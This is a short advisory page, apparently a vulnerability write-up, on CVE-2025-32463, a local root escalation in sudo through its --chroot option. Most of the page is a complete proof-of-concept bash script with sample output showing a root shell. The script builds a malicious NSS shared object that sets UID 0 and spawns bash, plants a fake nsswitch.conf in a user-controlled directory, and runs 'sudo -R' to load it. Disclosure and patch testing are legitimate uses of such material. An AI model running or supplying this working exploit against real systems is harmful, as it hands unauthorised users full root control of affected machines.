CVE-2025-32463

Sudo before 1.9.17p1 allows local users to obtain root access because "/etc/nsswitch.conf" from a user-controlled directory is used with the --chroot option.

PoC || GTFO

kdev :: ~ » ./cve-2025-32463.sh 
[*] Triggering escalation...
┌──(root㉿kdev)-[/]
└─# id
uid=0(root) gid=0(root) groups=0(root)

#!/bin/bash

WORKDIR=$(mktemp -d /tmp/escalate.XXXXXX)
cd "${WORKDIR}" || exit 1

# Malicious NSS module
cat > pwn.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void pwn() {
    setreuid(0, 0);
    setregid(0, 0);
    chdir("/");
    execl("/bin/bash", "bash", NULL);
}
EOF

# Setup fake config environment
mkdir -p rootfs/etc libnss_
echo "passwd: /pwn" > rootfs/etc/nsswitch.conf
cp /etc/group rootfs/etc

# Build the malicious shared object
gcc -shared -fPIC -Wl,-init,pwn -o libnss_/pwn.so.2 pwn.c

# Execute command in restricted root to trigger NSS lookup
echo "[*] Triggering escalation..."
sudo -R rootfs pwn

# Cleanup
rm -rf "${WORKDIR}"

Last updated 1 minute ago

Was this helpful?